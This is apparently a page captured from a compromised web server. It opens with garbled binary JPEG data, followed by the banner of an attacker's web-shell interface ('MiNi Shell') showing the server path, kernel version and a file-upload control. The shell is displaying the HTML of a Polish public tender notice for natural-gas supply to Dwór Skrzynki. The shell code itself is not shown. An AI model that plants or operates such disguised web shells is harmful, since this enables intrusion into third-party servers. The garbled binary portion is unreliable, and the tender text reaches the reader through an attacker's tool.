JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240604/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240604/0035135901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Kompleksowa dostawa gazu ziemnego wysokometanowego (symbol E) na potrzeby Dworu Skrzynki </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">INSTYTUT SKRZYNKI - INSTYTUT DOKUMENTACJI, ROZWOJU I PROMOCJI DZIEDZICTWA KULTUROWEGO I KULINARNEGO POWIATU POZNAŃSKIEGO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 388887726</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Plac Parkowy 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Skrzynki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-060</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL418 - Poznański</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kontakt@instytutskrzynki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.smakipowiatupoznanskiego.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Kompleksowa dostawa gazu ziemnego wysokometanowego (symbol E) na potrzeby Dworu Skrzynki </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-98ec2a98-22af-11ef-87ba-8eb060fd7bb8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00351359</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00035809/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa gazu ziemnego na potrzeby Instytutu Skrzynki</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://instytutskrzynki.ezamawiajacy.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://instytutskrzynki.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">4.1. Komunikacja pomiędzy Zamawiającym a Wykonawcami, w szczególności składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji (innych niż oferta Wykonawcy), odbywa się wyłącznie przy użyciu środków komunikacji elektronicznej, tj. Platformy zakupowej<br/>Zamawiającego https://instytutskrzynki.ezamawiajacy.pl/<br/>4.2. Wykonawca zamierzający wziąć udział w niniejszym postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto<br/>na Platformie zakupowej https://instytutskrzynki.ezamawiajacy.pl/<br/>4.3. Wykonawca jako profesjonalny podmiot ma obowiązek śledzenia i sprawdzania komunikatów oraz wiadomości bezpośrednio na<br/>Platformie zakupowej przesłanych przez Zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może<br/>trafić do folderu SPAM. Zamawiający nie bierze odpowiedzialności za sytuację, gdy Wykonawca nie dostanie e-maila z<br/>powiadomieniem z Platformy zakupowej. Wszelkie fakultatywne powiadomienia za pomocą poczty e-mail obciążone są ryzykiem<br/>błędów związanych z działaniem serwerów pocztowych, na których działanie Zamawiający nie ma wpływu. Uwaga: złożenie pliku na<br/>platformie oznacza jego dostarczenie.<br/>4.4. Wymagania techniczne i organizacyjne sporządzania, wysyłania i odbierania korespondencji elektronicznej, zostały opisane w<br/>Regulaminie korzystania z ww. Platformy zakupowej. Sposób sporządzenia, wysyłania i odbierania korespondencji elektronicznej<br/>musi być zgodny z wymaganiami określonymi w rozporządzeniu wydanym na podstawie art. 70 PZP.<br/>4.5. Korzystanie z Platformy zakupowej jest bezpłatne.<br/>4.6. W przypadku problemów technicznych z obsługą Platformy zakupowej, należy kontaktować się z Centrum Wsparcia Klienta ( od<br/>poniedziałku do piątku w godz. od 9.00 do 17.00 pod nr tel. 22 257 22 23 lub oneplace@marketplanet.pl ).<br/>4.7. Zamawiający zgodnie z § 11 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie zamieszcza wymagania dotyczące specyfikacji<br/>połączenia, formatu przesyłanych danych oraz szyfrowania:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>b) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów<br/>operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>c) zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;<br/>d) włączona obsługa JavaScript;<br/>e) zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>f) platforma działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,oznaczenie czasu odbioru danych przez<br/>platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem<br/>Głównego Urzędu Miar (źródłem czasu jest platforma),<br/>h) w razie używania kwalifikowanego podpisu elektronicznego - podłączony lub wbudowany do komputera czytnik karty<br/>kryptograficznej wydanej przez wystawcę certyfikatu używanego przez Wykonawcę.<br/>4.8. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia, akceptuje warunki korzystania z Platformy<br/>zakupowej, określone w Regulaminie korzystania z Platformy zakupowej i oznajmia, że będzie je przestrzegał.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>a) Administratorem Pani/Pana/Państwa danych osobowych jest Instytut Skrzynki - Instytut Dokumentacji, Rozwoju i Promocji Dziedzictwa Kulturowego i Kulinarnego Powiatu Poznańskiego ,<br/>Plac Parkowy 1, 62-060 Skrzynki;<br/>c) dane kontaktowe inspektora ochrony danych: Instytut Skrzynki - Instytut Dokumentacji, Rozwoju i Promocji Dziedzictwa Kulturowego i Kulinarnego Powiatu Poznańskiego , adres do korespondencji Plac Parkowy 1, 62-060 Skrzynki, e-mail: kontakt@instytutskrzynki.pl;<br/>d) Odbiorcami Pani/Pana/Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu ustawę Pzp;<br/>e) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn.: „Kompleksowa dostawa gazu ziemnego wysokometanowego (symbol E) na potrzeby Dworu<br/>Skrzynki&#34; nr postępowania:<br/>ZZP.271.222.2024.JS prowadzonym w postępowaniu o udzielenie zamówienia klasycznego o wartości mniejszej niż progi unijne,<br/>przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwania umowy, a po tym czasie przez okres zgodny z ustawą z dnia 14 lipca 1983 r. o<br/>narodowym zasobie archiwalnym i archiwach (t.j. Dz. U. z 2020 r. poz. 164) lub innymi szczegółowymi przepisami prawa;<br/>f) obowiązek podania przez Pani/Pana/Państwa danych osobowych bezpośrednio Pani/Pana/ Państwa dotyczących jest wymogiem<br/>ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>g) w odniesieniu do Pani/Pana/Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany,<br/>stosowanie do art. 22 RODO;<br/>h) posiada/posiadają Pani/Pan/Państwo:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana/Państwa dotyczących;<br/>- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana/Państwa danych osobowych<br/>(wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu<br/>oraz jego załączników);<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO (wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w<br/>odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1. Nie przysługuje Pani/Panu/Państwu:<br/>1) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>3) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana/Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>2. Zamawiający ponadto informuje:<br/>1) w przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1–3 rozporządzenia 2016/679, wymagałoby<br/>niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji<br/>mających w szczególności na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia,<br/>2) skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16<br/>rozporządzenia 2016/679, nie może naruszać integralności protokołu oraz jego załączników.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZZP.271.222.2024.JS</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest kompleksowa dostawa gazu ziemnego wysokometanowego (symbol E) obejmująca sprzedaż i dystrybucję paliwa gazowego na potrzeby Zamawiającego, tj. do dworu w Skrzynkach (zwanego Dwór Skrzynki) położonego w Skrzynkach (62-060) przy ul. Plac Parkowy 1, gmina Stęszew, dz.130/1. Do celów niniejszego postępowania Zamawiający przyjął przewidywane zużycie gazu ziemnego w okresie 12 m-cy na poziomie 378 856 kWh. Wskazane zużycie może odbiegać od faktycznego zużycia gazu w okresie trwania umowy i ma charakter jedynie orientacyjny, służący porównaniu ofert i w żadnym wypadku nie stanowi ze strony Zamawiającego zobowiązania do zakupu gazu ziemnego w podanej ilości. Wykonawcy nie będzie przysługiwało żadne roszczenie z tytułu niepobrania przez Zamawiającego podanej orientacyjnej ilości gazu. Wynagrodzenie Wykonawcy będzie obliczane według cen jednostkowych określonych w ofercie i rzeczywistego odbioru paliwa gazowego w poszczególnych punktach poboru.<br/>Dostarczanie gazu będzie odbywać na podstawie umowy zawierającej postanowienia umowy sprzedaży i umowy o świadczenie usług dystrybucji gazu (umowa kompleksowa) i będzie wykonywane zgodnie z obowiązującym prawem, w szczególności na warunkach określonych przez ustawę z dnia 10 kwietnia 1997 r. Prawo energetyczne (t.j. Dz.U. z 2024 r. poz. 266 ze zm.) oraz wydanych na jej podstawie przepisów wykonawczych. Szczegóły opisu przedmiotu zamówienia zawiera SWZ i jej załączniki. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09123000-7 - Gaz ziemny</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">65210000-8 - Przesył gazu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-07-01 do 2025-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">13.1. Ocenie podlegają jedynie oferty niepodlegające odrzuceniu.<br/>13.2. Zamawiający wybierze najkorzystniejszą ofertę kierując się kryterium <br/> wyboru: cena brutto – 100 %.<br/>13.3. Zamawiający ofercie o najniższej łącznej cenie brutto spośród ofert <br/> ocenianych przyzna 100 punktów, a każdej następnej zostanie <br/> przyporządkowana liczba punktów proporcjonalnie mniejsza, według <br/> wzoru:<br/> C = cena najniższa spośród złożonych ofert / cena badanej oferty x 100 <br/> pkt.<br/>13.4. Oferty oceniane będą punktowo. Maksymalna ilość punktów, jaką po <br/> uwzględnieniu wag może osiągnąć oferta wynosi 100,00<br/> pkt równa jest określonej wadze kryterium w %. Przyjmuje się, że 1% = <br/> 1 punkt i tak zostanie przeliczona liczba punktów w przyjętym<br/> kryterium.<br/>13.5. Obliczenia punktów dokonywane będą z dokładnością do dwóch miejsc <br/> po przecinku. Uzyskana liczba punktów w ramach<br/> kryterium zaokrąglana będzie do drugiego miejsca po przecinku.<br/>13.6. Standardy jakościowe, o których mowa w art. 246 ust. 2 PZP zostały <br/> określone w opisie przedmiotu zamówienia. Dokumenty te<br/> wskazują zakresy, czynności i parametry niezbędne do realizacji <br/> przedmiotu zamówienia jak również uwzględniają także wszystkie<br/> elementy, które mają wpływ na koszty związane z realizacją przedmiotu <br/> zamówienia. Dokumenty opisujące przedmiot zamówienia<br/> są tak precyzyjne, że bez względu na fakt, kto będzie Wykonawcą <br/> przedmiotu zamówienia jedyną różnicą będą zaoferowane ceny<br/> (tzn. przedmiot zamówienia jest zestandaryzowany - identyczny, <br/> niezależnie od tego, który z Wykonawców go wykona). W związku z<br/> powyższym Zamawiający jest upoważniony do zastosowania ceny jako <br/> jedynego kryterium wyboru oferty najkorzystniejszej lub ceny<br/> jako jednego z kryteriów wyboru oferty o znaczeniu ponad 60%.<br/>13.7. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy <br/> wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>13.8. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie <br/> uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>a) zdolności do występowania w obrocie gospodarczym – Zamawiający nie wyznacza warunku w tym zakresie;<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów –<br/>Zamawiający uzna spełnienie przedmiotowego warunku jeżeli wykonawca wykaże, iż posiada aktualnie obowiązującą<br/>koncesję na prowadzenie działalności gospodarczej w zakresie obrotu paliwami gazowymi, wydanej przez Prezesa Urzędu Regulacji Energetyki, zgodnie z wymogami ustawy z dnia 10 kwietnia 1997 r. Prawo<br/>energetyczne (Dz.U. z 2024 r. poz. 266 ze zm.), ważnej w okresie wykonywania zamówienia.;<br/>a) Sytuacji ekonomicznej lub finansowej - Zamawiający nie wyznacza warunku w tym zakresie;<br/>b) Zdolności technicznej lub zawodowej - – Zamawiający nie wyznacza warunku w tym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy w zakresie art. 108 ust. 1 pkt 5 PZP o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2024 r. poz. 594 ze zm.) z innym Wykonawcą, który złożył odrębną ofertę albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej, w celu potwierdzenia braku podstawy do wykluczenia Wykonawcy z postępowania, o której mowa w art. 108 ust. 1 pkt 5 PZP – według Załącznika nr 3 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Aktualnie obowiązującą koncesję na prowadzenie działalności gospodarczej w zakresie obrotu paliwami gazowymi, wydanej przez Prezesa Urzędu Regulacji Energetyki, zgodnie z wymogami ustawy z dnia 10 kwietnia 1997 r. Prawo energetyczne (t.j. Dz.U. z 2024 r. poz. 266 ze zm.), ważnej w okresie wykonywania zamówienia.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 10.1. Oferta musi być sporządzona w języku polskim, w postaci elektronicznej opatrzonej (podpisanej) kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonym podpisem zaufanym (ePUAP) lub elektronicznym podpisem osobistym w ogólnie dostępnych formatach danych, w szczególności w formatach: .txt, .rtf, .pdf, .doc, .docx, .odt. Do przygotowania oferty zaleca się skorzystanie z Formularza oferty, stanowiącego Załącznik nr 1 do SWZ. W przypadku gdy Wykonawca nie korzysta z przygotowanego przez Zamawiającego wzoru Formularza oferty, oferta powinna zawierać wszystkie informacje – treści - wymagane we wzorze udostępnionego przez Zamawiającego wzoru Formularza oferty. Jako ofertę Wykonawca składa następujące dokumenty:<br/>1) wypełniony i podpisany Formularz ofertowy – wg wzoru stanowiącego <br/> Załącznik nr 1 do SWZ;<br/>2) oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków <br/> udziału w postępowaniu w zakresie wskazanym w SWZ – wg wzoru <br/> stanowiącego Załącznik nr 2 do SWZ;<br/>3) pełnomocnictwo (jeżeli dotyczy);<br/>4) zobowiązanie podmiotu trzeciego do udostępnienia zasobów (jeżeli <br/> dotyczy, wzór własny Wykonawcy).<br/>10.2. Oświadczenie o spełnianiu warunków udziału i braku podstaw do <br/> wykluczenia, stanowi dowód potwierdzający brak podstaw wykluczenia <br/> i spełnianie warunków udziału w 